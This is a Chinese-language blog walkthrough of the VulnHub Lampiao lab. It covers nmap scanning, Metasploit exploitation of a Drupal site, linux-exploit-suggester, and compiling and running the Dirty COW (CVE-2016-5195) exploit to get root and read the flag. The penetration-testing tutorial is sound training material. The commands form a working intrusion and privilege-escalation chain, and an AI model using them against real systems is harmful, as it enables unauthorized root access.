Linux提权脏牛内核漏洞演示
通过这篇文章你将学会利用Linux的脏牛内核漏洞配合MSF提权
靶机下载地址:https://www.vulnhub.com/entry/lampiao-1,249/
攻击机:Kali 2022
靶机无密码 无图形化界面
攻击机Kali
攻击过程
Nmap 网段扫描
nmap扫描网段寻找存活IP
namp 192.168.75.0/24
扫描端口寻找存活端口 注意这里 "-p1-65535" 是扫描从1到65535的所有端口
nmap -p1-65535 192.168.75.144
Web渗透

Web站点
已知是知名CMS 利用kali进行攻击
首先发现192.168.76.141,开放的80端口,可以访问。在端口扫描中发现开放的1898端口并可以访问。1898端口的网页中有“Powered by Drupal”字样,> 搜索“drupal”确定是CMS。搜索drupal CMS的漏洞,可以在搜索引擎搜,或在msf搜索


show options
set rhost 192.168.75.144
set rport 1898
exploit

攻击成功
内网渗透
使用脚本进行信息收集——漏洞探针
脚本地址:https://github.com/mzet-/linux-exploit-suggester
上传漏洞探针脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
进入shell命令 进去/tmp/文件夹使用1.sh
发现脏牛漏洞 下载或上传exp
下载地址:https://github.com/gbonacini/CVE-2016-5195

进入shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
该exp需要一个交互式的终端,不然无法正常执行。这里开一个虚拟的交互终端
运行
./dcow
运行成功,dcow回显了一个root密码,用它登录
su root
在root文件夹下有flag
cat /root/flag.txt
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)